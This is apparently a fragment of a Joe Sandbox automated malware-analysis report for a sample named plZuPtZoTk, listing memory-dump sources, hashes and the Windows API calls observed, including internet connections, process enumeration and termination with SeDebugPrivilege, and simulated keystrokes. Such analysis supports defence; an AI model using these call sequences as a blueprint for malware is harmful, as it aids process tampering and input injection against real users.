                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee7b904fb85da3b0f44a599a8b6be82bb48e1cdb56ecea73b9aef6431d3b99fc
                                                                      • Instruction ID: 22f30bd5c1cb97e8eeefd3e9bcfe2860d1b49dbf751a11b5ad49ea1c0c213513
                                                                      • Opcode Fuzzy Hash: ee7b904fb85da3b0f44a599a8b6be82bb48e1cdb56ecea73b9aef6431d3b99fc
                                                                      • Instruction Fuzzy Hash: 45C1F475A0424DAFCB11DFA9D841BBEBBB4BF49310F18409AE614A7392CB359D41CB61
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 1282221369-0
                                                                      • Opcode ID: 741a135dfe7f06c6bd0f4143c5df2d8539ff66cc1202c31e9ac77a5ab38d351e
                                                                      • Instruction ID: a5404ddf25dcbbce005c6b01227dbdf8af0c46539cc397e41768558626701ab3
                                                                      • Opcode Fuzzy Hash: 741a135dfe7f06c6bd0f4143c5df2d8539ff66cc1202c31e9ac77a5ab38d351e
                                                                      • Instruction Fuzzy Hash: 64614AB1A0430DAFDB21AFB49981B7EBBA9EF45350F04816EFB419B281DB319D018790
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A55186
                                                                      • ShowWindow.USER32(?,00000000), ref: 00A551C7
                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A551CD
                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A551D1
                                                                        • Part of subcall function 00A56FBA: DeleteObject.GDI32(00000000), ref: 00A56FE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A5520D
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A5521A
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A5524D
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A55287
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A55296
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 907c32edd3a28a417a179961453b7841faf26ae70a819bcecfd5c746578b49db
                                                                      • Instruction ID: 0913c2a350449938e83e17379cf4799f7ee40227283e48aa1c2007e78c07f0ba
                                                                      • Opcode Fuzzy Hash: 907c32edd3a28a417a179961453b7841faf26ae70a819bcecfd5c746578b49db
                                                                      • Instruction Fuzzy Hash: D3518F30E50A08BEEF20AF74CC66BD93BB5FB15322F148112FE15966E0C775A988DB41
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A16890
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A168A9
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A168B9
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A168D1
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A168F2
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00A16901
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A1691E
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00A1692D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0
                                                                      • Opcode ID: 22144a6c0bba86b306839d8217eaf2462d78c15343bd456f5ce7bec7bc1a148a
                                                                      • Instruction ID: 23c7c6d811c38b28ec1093c531a93377bba6bb758189a1a9e1e8445b2aa4420b
                                                                      • Opcode Fuzzy Hash: 22144a6c0bba86b306839d8217eaf2462d78c15343bd456f5ce7bec7bc1a148a
                                                                      • Instruction Fuzzy Hash: 2B51A770640309AFDB20CF64CC95FAA7BB5FB48760F10891AF912D72A0DB78E991DB40
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A3C182
                                                                      • GetLastError.KERNEL32 ref: 00A3C195
                                                                      • SetEvent.KERNEL32(?), ref: 00A3C1A9
                                                                        • Part of subcall function 00A3C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A3C272
                                                                        • Part of subcall function 00A3C253: GetLastError.KERNEL32 ref: 00A3C322
                                                                        • Part of subcall function 00A3C253: SetEvent.KERNEL32(?), ref: 00A3C336
                                                                        • Part of subcall function 00A3C253: InternetCloseHandle.WININET(00000000), ref: 00A3C341
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 337547030-0
                                                                      • Opcode ID: 19074fee050ae2b69a8df91ccf850a2abf3c504d0170a7160deb0aa4d85286c0
                                                                      • Instruction ID: c086b16b7af2cef39879392ac1115fa89f3fab25390a5b3911d3d2b4022adaf1
                                                                      • Opcode Fuzzy Hash: 19074fee050ae2b69a8df91ccf850a2abf3c504d0170a7160deb0aa4d85286c0
                                                                      • Instruction Fuzzy Hash: 7331AD71200705AFDB21AFE5DD04AABBBF8FF18321F00451DF956A6610D730E811EBA0
                                                                      APIs
                                                                        • Part of subcall function 00A23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A23A57
                                                                        • Part of subcall function 00A23A3D: GetCurrentThreadId.KERNEL32 ref: 00A23A5E
                                                                        • Part of subcall function 00A23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A225B3), ref: 00A23A65
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A225BD
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A225DB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A225DF
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A225E9
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A22601
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A22605
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A2260F
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A22623
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A22627
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: eb5ff3b719197696e6828b1152eddafa1f6d4babe30a748a96de5856c1516165
                                                                      • Instruction ID: 72f41db1474bf3037cb47f62c79c20b3fd5f7889cf83735b759789c9de85b1d3
                                                                      • Opcode Fuzzy Hash: eb5ff3b719197696e6828b1152eddafa1f6d4babe30a748a96de5856c1516165
                                                                      • Instruction Fuzzy Hash: 3501D831390720BBFB10A7A89C8AF593F99EB4EB62F100021F314AE1D5C9E614458A69
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A21449,?,?,00000000), ref: 00A2180C
                                                                      • HeapAlloc.KERNEL32(00000000,?,00A21449,?,?,00000000), ref: 00A21813
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A21449,?,?,00000000), ref: 00A21828
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00A21449,?,?,00000000), ref: 00A21830
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00A21449,?,?,00000000), ref: 00A21833
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A21449,?,?,00000000), ref: 00A21843
                                                                      • GetCurrentProcess.KERNEL32(00A21449,00000000,?,00A21449,?,?,00000000), ref: 00A2184B
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00A21449,?,?,00000000), ref: 00A2184E
                                                                      • CreateThread.KERNEL32(00000000,00000000,00A21874,00000000,00000000,00000000), ref: 00A21868
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 5fa010962e0b6b4119442f0c2e939298762a60e67f09be3a77cc9d6c20d5106b
                                                                      • Instruction ID: d622d8b65d7fc294c201bb71b8f02a9076502d8d9dcf8e53de61808a525ed6f3
                                                                      • Opcode Fuzzy Hash: 5fa010962e0b6b4119442f0c2e939298762a60e67f09be3a77cc9d6c20d5106b
                                                                      • Instruction Fuzzy Hash: B401A8B5640708BFE610EBA5DC49F6B7BACFB89B21F004511FA05DB1A5CA709841CB20
                                                                      APIs
                                                                        • Part of subcall function 00A2D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00A2D501
                                                                        • Part of subcall function 00A2D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00A2D50F
                                                                        • Part of subcall function 00A2D4DC: CloseHandle.KERNEL32(00000000), ref: 00A2D5DC
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4A16D
                                                                      • GetLastError.KERNEL32 ref: 00A4A180
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A4A1B3
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A4A268
                                                                      • GetLastError.KERNEL32(00000000), ref: 00A4A273
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4A2C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: c784fbb44add528c0490a74e99635dac321b84ba451faf75c11452482592b3d6
                                                                      • Instruction ID: 2be7522708b51bf6ac4cff7b4ab264379872e02291b2ce69215832eb8e9743ed
                                                                      • Opcode Fuzzy Hash: c784fbb44add528c0490a74e99635dac321b84ba451faf75c11452482592b3d6
                                                                      • Instruction Fuzzy Hash: 51618F742443429FD710DF18C494F5ABBE1AFA4318F54849CE46A4B7A3C7B2ED46CB92
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A53925
                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A5393A
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A53954
                                                                      • _wcslen.LIBCMT ref: 00A53999
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A539C6
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A539F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcslen
                                                                      • String ID: SysListView32
                                                                      • API String ID: 2147712094-78025650
                                                                      • Opcode ID: 184969448054d604b9ad85b6af41027ae8e33ba0b798d2feb39d6db4a2ebf9e6
                                                                      • Instruction ID: cef958324c92eb24ef89d4788cd9b9ce14e06f366da1eab4d859dcb8f0013177
                                                                      • Opcode Fuzzy Hash: 184969448054d604b9ad85b6af41027ae8e33ba0b798d2feb39d6db4a2ebf9e6
                                                                      • Instruction Fuzzy Hash: 03419172A00319ABEF21DF64CC45BEA7BA9FF48391F100526F958E7281D7759E84CB90
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A2BCFD
                                                                      • IsMenu.USER32(00000000), ref: 00A2BD1D
                                                                      • CreatePopupMenu.USER32 ref: 00A2BD53
                                                                      • GetMenuItemCount.USER32(01665130), ref: 00A2BDA4
                                                                      • InsertMenuItemW.USER32(01665130,?,00000001,00000030), ref: 00A2BDCC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 0$2
                                                                      • API String ID: 93392585-3793063076
                                                                      • Opcode ID: 3845b95a520b1c6db6d0911503631a44aae587312c5f279bb4fe148341b85749
                                                                      • Instruction ID: c12c45fa74112f2377c1ffadb060de870918776238c834145b87532dc36f8a54
                                                                      • Opcode Fuzzy Hash: 3845b95a520b1c6db6d0911503631a44aae587312c5f279bb4fe148341b85749
                                                                      • Instruction Fuzzy Hash: 7C519C70A103259BDB10DFACE988BEEBBF4BF45324F148169E45197291E7709941CB61
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00A2C913
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: be6fff0c48c63f89e920c80d6efce394a11944409f3e01227ca0c7e35642982c
                                                                      • Instruction ID: 3ae0f581ef27fe770e2cdc067c9010c83d6792d501b0504f8ed624e27048cc82
                                                                      • Opcode Fuzzy Hash: be6fff0c48c63f89e920c80d6efce394a11944409f3e01227ca0c7e35642982c
                                                                      • Instruction Fuzzy Hash: 7D113D32689316BEF701AB58BC83DAE27ACDF19334B10003AF500A7282D7B05E4053A8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: 31bf65e4a22e6f36d43859d9a6abcaa763d7082fe901afcabda2e2fd9f625614
                                                                      • Instruction ID: fecf3b83c5b56faa0f81d36a22a793f455db46bcb5a44e353a707c0e96d5e3c3
                                                                      • Opcode Fuzzy Hash: 31bf65e4a22e6f36d43859d9a6abcaa763d7082fe901afcabda2e2fd9f625614
                                                                      • Instruction Fuzzy Hash: F8419665C1025875CB12EBF6888ABCF77A8AF85750F504462E624F3222FB34E655C3E5
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 009DF953
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 00A1F3D1
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 00A1F454
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 767684f6d9d5016411b6ae4400fea46cc13a60ae7e778467f450d882e7772c5b
                                                                      • Instruction ID: e32887da2a9b9ec5d230e4fd9b43f5f0673e450d80536fbcf2497c1de39f6163
                                                                      • Opcode Fuzzy Hash: 767684f6d9d5016411b6ae4400fea46cc13a60ae7e778467f450d882e7772c5b
                                                                      • Instruction Fuzzy Hash: 9A412A30A48BC0BEC739CB2988B976A7B95BB46360F14C43EE09B56B64D635A8C1C711
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00A52D1B
                                                                      • GetDC.USER32(00000000), ref: 00A52D23
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A52D2E
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00A52D3A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A52D76
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A52D87
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A55A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00A52DC2
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A52DE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: fd586f3dea595a75a1a2b13a677c0a7f7231fb16b8f89cb5e1a1ff3846c20dbe
                                                                      • Instruction ID: ba27686fa9750dd47c8310d09ac92ca67f92ebb7c3476b7364c0d7277b23362c
                                                                      • Opcode Fuzzy Hash: fd586f3dea595a75a1a2b13a677c0a7f7231fb16b8f89cb5e1a1ff3846c20dbe
                                                                      • Instruction Fuzzy Hash: 93317C72201314BFEB118F50DC8AFEB3BA9FF0A726F044055FE08AA295C6759C51CBA4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 6b31a505825406c2427ccdbee23fbcf64827f92d111f919c041eed0ec94c93f8
                                                                      • Instruction ID: 26085453b9522d1b021574b408eee4cdac33ada9f945fafe9c592f017927ca58
                                                                      • Opcode Fuzzy Hash: 6b31a505825406c2427ccdbee23fbcf64827f92d111f919c041eed0ec94c93f8
                                                                      • Instruction Fuzzy Hash: E821C671E41A69BFD2159639AE82FFB335CBF61385F480430FD049A685F731ED1481A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
